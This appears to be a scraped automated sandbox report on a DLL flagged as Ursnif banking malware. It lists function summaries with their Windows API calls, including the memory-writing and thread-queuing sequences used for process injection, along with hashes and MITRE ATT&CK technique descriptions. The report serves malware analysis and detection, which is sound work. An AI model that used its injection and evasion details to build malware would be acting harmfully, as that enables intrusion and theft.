Instruction ID: a08e3f8d035113768321abb3a4e9a38a928e8fb86309743ecd03b031bb0e3c3c
Opcode Fuzzy Hash: cec383d4cd5be70a93901608133fcba7ac5038a2d71a3e75e1f85135671025c5
Instruction Fuzzy Hash: D7E09235710A844FE7046BF599C82BA77D1E788215F100939E885C7220DA29C8848241

Uniqueness

Uniqueness Score: -1.00%

Function 009C2448, Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 009A7304: FindCloseChangeNotification.KERNELBASE ref: 009A73B0

VirtualProtectEx.KERNELBASE ref: 009C254F
ResumeThread.KERNELBASE ref: 009C258C
SuspendThread.KERNELBASE ref: 009C25AF

Part of subcall function 009C6A5C: RtlAllocateHeap.NTDLL ref: 009C6B04

VirtualProtectEx.KERNELBASE ref: 009C262C

Part of subcall function 009C75C8: VirtualProtectEx.KERNELBASE ref: 009C761C

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ProtectVirtual$Thread$AllocateChangeCloseFindHeapNotificationResumeSuspend
String ID:
API String ID: 1287749370-0
Opcode ID: 15e7bf8842743fed7b84804bae77516cfe42983b32f4ee478d663fa58ed80026
Instruction ID: 29f3b19dcaf08911faef86c3678a869ff4a24acc0e0dc4720cdd9a674c37b28a
Opcode Fuzzy Hash: 15e7bf8842743fed7b84804bae77516cfe42983b32f4ee478d663fa58ed80026
Instruction Fuzzy Hash: A561AF30B1CB484FDB58EB18D885B6AB3D5FB89311F10452EE58BC3291DF38D9468A47

Uniqueness

Uniqueness Score: -1.00%

Function 009A5838, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 009A590C
SetFilePointer.KERNELBASE ref: 009A5926
ReadFile.KERNELBASE ref: 009A5948
FindCloseChangeNotification.KERNELBASE ref: 009A5963

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 36ff8efb6679f5466eb90e53da94e97b5b395a705cc24d389ff98479f336d1ad
Instruction ID: 440531f7c0e0246cd658cd809c54eb87211887017ef2d3820b644304d376e1b4
Opcode Fuzzy Hash: 36ff8efb6679f5466eb90e53da94e97b5b395a705cc24d389ff98479f336d1ad
Instruction Fuzzy Hash: C341C830318E088FDB58DF28D8C8A2A77E1FBD9315B65466DD08AC7261DA39D847CB81

Uniqueness

Uniqueness Score: -1.00%

Function 009AB518, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8074: RegCreateKeyA.ADVAPI32 ref: 009C8097

RegQueryValueExA.KERNELBASE ref: 009AB581

Strings

(, xrefs: 009AB5D0
(, xrefs: 009AB58D

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: 832472d3734cc6f47299b4fc43428eaed93958d4b477d959924be0505ab4113c
Instruction ID: d8fbc44d38c13f0d3cc1b8bebfffa49fc57e13783ee906faeb1174741d714c43
Opcode Fuzzy Hash: 832472d3734cc6f47299b4fc43428eaed93958d4b477d959924be0505ab4113c
Instruction Fuzzy Hash: A641E5306187488FE729DF14DC9866673E5F799305F20412DE88AC32A1EF79D947CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009CB038, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 009CB175

Strings

H, xrefs: 009CB05C

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: d6a6ac0830f2970704094e574fb554c5ceb8b7c77036587f7b5c8f204be07d29
Instruction ID: b9cb2e89fce14d1099272e08f4b120f22a535490c58173d5c8effd40c9dd6a6a
Opcode Fuzzy Hash: d6a6ac0830f2970704094e574fb554c5ceb8b7c77036587f7b5c8f204be07d29
Instruction Fuzzy Hash: 64A18130508B098FE755DF58D899B7AB7E5FBA8305F04462ED88AC7261EF34D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009B21A8, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B1FC0: VirtualProtect.KERNELBASE ref: 009B1FF3

VirtualProtect.KERNELBASE ref: 009B22C9
VirtualProtect.KERNELBASE ref: 009B22EC

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2de77a6af2156699d0835d0e557cd077459e401f376e5e8954a41830239c5343
Instruction ID: 29449c4f7aff40046d787527ff366dcc041f4fcf9cedb2552adbc2f77b4d37d5
Opcode Fuzzy Hash: 2de77a6af2156699d0835d0e557cd077459e401f376e5e8954a41830239c5343
Instruction Fuzzy Hash: 5951BE70618B098FD744EF28D9897A5B7E0FBAC711F10456EE44EC7265EB38E941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009B6504, Relevance: 3.2, APIs: 2, Instructions: 152COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 009B6577
RtlAddVectoredContinueHandler.NTDLL ref: 009B666B

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 7d474f740c86d8d2be94d957f5437acad6063e6eaddfd226719a4add62369066
Instruction ID: a0818f08fed83a502eb04b48ead53dc457b03a789f9597092dbc523b5b63c8e7
Opcode Fuzzy Hash: 7d474f740c86d8d2be94d957f5437acad6063e6eaddfd226719a4add62369066
Instruction Fuzzy Hash: C241D530618A098FEB55EF38D8587EA77E6FB98314B45852FA44AC3265DF3CE901CB41

Uniqueness

Uniqueness Score: -1.00%

Function 009C3A7C, Relevance: 3.1, APIs: 2, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE ref: 009C3AD6
RegCloseKey.KERNELBASE ref: 009C3B4F

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 6e3fa506b2421b56b0cddf4faa74cddfbe4382e740802b04991199095b52e217
Instruction ID: 95985078212020f6ca65b3c93cd3a788b18438a97456e2a517840e745e4f7dc4
Opcode Fuzzy Hash: 6e3fa506b2421b56b0cddf4faa74cddfbe4382e740802b04991199095b52e217
Instruction Fuzzy Hash: 67313071618B484FD794EF28E885A6AB7E1F798300B408A7EE54AC3265DF34D944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009B8C94, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 009B8CD7
RegQueryValueExA.KERNELBASE ref: 009B8D5B

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1fbd59c0df1146624ff5fe6e0b00124f0e5568be42d3e8690caa03b2bf8fb75f
Instruction ID: 336ab122b8de4fdd1b697411269f2eeca9a101ea0eaa0a249c38ff2c9f34685f
Opcode Fuzzy Hash: 1fbd59c0df1146624ff5fe6e0b00124f0e5568be42d3e8690caa03b2bf8fb75f
Instruction Fuzzy Hash: 5631843161CB088FDB48EF58D4896A6B7E1FBA8311F11455EE849C3291DF74E840CB86

Uniqueness

Uniqueness Score: -1.00%

Function 009BF358, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,009A497D), ref: 009BF396
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,009A497D), ref: 009BF403

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 05463b53360704e9eef6b60b4d085fa781837bc5b76a7aabe424cf046b48713c
Instruction ID: 9b5444ba746ee6b1efb24efb930bea6c677b3aa275f72e10e9de4326051346d9
Opcode Fuzzy Hash: 05463b53360704e9eef6b60b4d085fa781837bc5b76a7aabe424cf046b48713c
Instruction Fuzzy Hash: 11215E71618B098FE758EF2CE899666B7E2FB98311F10446EE44AC3261DB74DD41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 009C8074, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 009C8097
RegOpenKeyA.ADVAPI32 ref: 009C80A4

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 62247e16eff71e4105f1c6a237c6a7f2b2bbcbccb0f1f319ca3f5c533c7ae8c2
Instruction ID: 024a07a99ae2193f29aa84ea3e184e5b64dc3a22b40a758ccd73bf697d33c032
Opcode Fuzzy Hash: 62247e16eff71e4105f1c6a237c6a7f2b2bbcbccb0f1f319ca3f5c533c7ae8c2
Instruction Fuzzy Hash: 1E018030A18A058FDB84EB5CD488B6BBBE5FBE8311F10442EE94EC3260DE74C9458787

Uniqueness

Uniqueness Score: -1.00%

Function 009BB64C, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009BB67C
QueueUserAPC.KERNELBASE ref: 009BB693

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: 8dabf5a141576640d2b7f087de8a54da9cf4c576b89e18d7d0f8cdf607f23ac5
Instruction ID: 229f158fc22de87a49488daf57ad6cf32a0b01ab01459054017a5f9b67105a25
Opcode Fuzzy Hash: 8dabf5a141576640d2b7f087de8a54da9cf4c576b89e18d7d0f8cdf607f23ac5
Instruction Fuzzy Hash: 7D012931758A044FEB48EF6DE84D7A977E2EB9C3117148159E509C7270DF74DC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 009B1DBC, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 009B1F07

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7382195ef688eaddf3922c60e0ddaf1994474945d40aa54a9f5b6cf63fb11b9a
Instruction ID: a8b214d4c3bb5c164e7fb43dbf6d6bb1adc9ea54195dafcc969e8bb1a4262f54
Opcode Fuzzy Hash: 7382195ef688eaddf3922c60e0ddaf1994474945d40aa54a9f5b6cf63fb11b9a
Instruction Fuzzy Hash: 0361DA30518F099FD794EF18D9996B577E4FB68311F90462EE84AC3261EB34E841CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 009C8744, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 009C87E8

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7cf46c9985917145bb2146d3f80033df1692681f115b5e2086595519b7c33a3f
Instruction ID: 90321230027dc8af5dea4a9d5f51e6567ffd2444f9e5d67a99116b138c7aa521
Opcode Fuzzy Hash: 7cf46c9985917145bb2146d3f80033df1692681f115b5e2086595519b7c33a3f
Instruction Fuzzy Hash: BC312F7060CB484FDB64EF1C9485A6573E5EB98311F50466EE84DC3261DF30EC418786

Uniqueness

Uniqueness Score: -1.00%

Function 009ABA3C, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,00000005,009AFFCF), ref: 009ABB19

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 08c8690d29840b629b8f1a747191f93de95e86036eb3b3b48ddda92b79c7af5a
Instruction ID: b859f4c49cfba8cdccbc326e47ce869aa561ad037e9c1fa292e03f334b298b2b
Opcode Fuzzy Hash: 08c8690d29840b629b8f1a747191f93de95e86036eb3b3b48ddda92b79c7af5a
Instruction Fuzzy Hash: 593154343156048BAB68EF79DCD5A6A73E6EBD93007248529A407C3266DF38DD078791

Uniqueness

Uniqueness Score: -1.00%

Function 009C0F54, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 009C0FF6

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 3eda59e2be473b3dc26175e9670a793b1f9ff9ccfe90412f4932646b6eaa67be
Instruction ID: 7107c2a3ad1b11afa658ec2ac6041f98a9fb660b115a81bae4aeb8be533f9719
Opcode Fuzzy Hash: 3eda59e2be473b3dc26175e9670a793b1f9ff9ccfe90412f4932646b6eaa67be
Instruction Fuzzy Hash: 5421A734718A0C8FEB58EF68A899B7977D1F799300F10852DE55BC3252EE24DC968782

Uniqueness

Uniqueness Score: -1.00%

Function 009B1FC0, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 009B1FF3

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 40f5aecf288f058d529883b6c903815f00a8116155dae9c90ee8ca9008adc625
Instruction ID: 93e29e88dd6d9a999333ed6492f1db2ab9c93887c55109da165ddbcea0f0000a
Opcode Fuzzy Hash: 40f5aecf288f058d529883b6c903815f00a8116155dae9c90ee8ca9008adc625
Instruction Fuzzy Hash: 42118E3160CB088FAB14FF18A8864A9B3E5EB98315750452EEC4EC3256EB34E905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009A7304, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 009A73B0

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d765e3e3718618cb85700a983ef7fc8a9b7ec9735ccd6c98b5bd498846155ae6
Instruction ID: 6ac30d1287a30206510947f8bfcfa85d14da1eccc1a03dc540b215c0a6e519aa
Opcode Fuzzy Hash: d765e3e3718618cb85700a983ef7fc8a9b7ec9735ccd6c98b5bd498846155ae6
Instruction Fuzzy Hash: 06217530218F098FEB64EF6DD898A6AB7E5FB99301B21452DE909C3260DF74DC058B81

Uniqueness

Uniqueness Score: -1.00%

Function 009C75C8, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 009B72AC: NtWriteVirtualMemory.NTDLL ref: 009B72CB

VirtualProtectEx.KERNELBASE ref: 009C761C

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 6b80a691fc55ab5c1cd3b8c67872d3b4e18e59a3d90c2657b09483c02a5fecf1
Instruction ID: eac73525935d323f3be2fdd90fb15b9703bae78b7be716b66943fc380309abfa
Opcode Fuzzy Hash: 6b80a691fc55ab5c1cd3b8c67872d3b4e18e59a3d90c2657b09483c02a5fecf1
Instruction Fuzzy Hash: 3A011A70A18B088FCB48EF99A4C5625B7E0EB98311B40456EE94DC729ADA70D984CB86

Uniqueness

Uniqueness Score: -1.00%

Function 009A6C0C, Relevance: 1.5, APIs: 1, Instructions: 242stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 009A6D3E

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 35db23b0d3b21b33ecdf8d7b7e07f3a494a7bcb24e72ad8c6c20c12f2046c997
Instruction ID: e102b844c24cbe77cd40dc4b614f625290c5b4fb689c40f126524ceb231b0a61
Opcode Fuzzy Hash: 35db23b0d3b21b33ecdf8d7b7e07f3a494a7bcb24e72ad8c6c20c12f2046c997
Instruction Fuzzy Hash: 63718070618B458FC768DF18C88567AB7E5FB99714F14462EE4CAC3251DB34E852CBC2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 100181C0, Relevance: 622.4, APIs: 353, Strings: 2, Instructions: 1186
clipboardfilewindowCOMMON

Function 02F632BA, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 015110FC, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
